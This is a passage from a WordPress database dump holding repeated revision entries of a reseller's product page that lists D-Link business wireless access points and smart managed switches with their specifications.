src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:32:47','2019-09-25 06:32:47','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3406,1,'2019-09-25 14:34:29','2019-09-25 06:34:29','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:34:29','2019-09-25 06:34:29','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3407,1,'2019-09-25 14:34:54','2019-09-25 06:34:54','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br 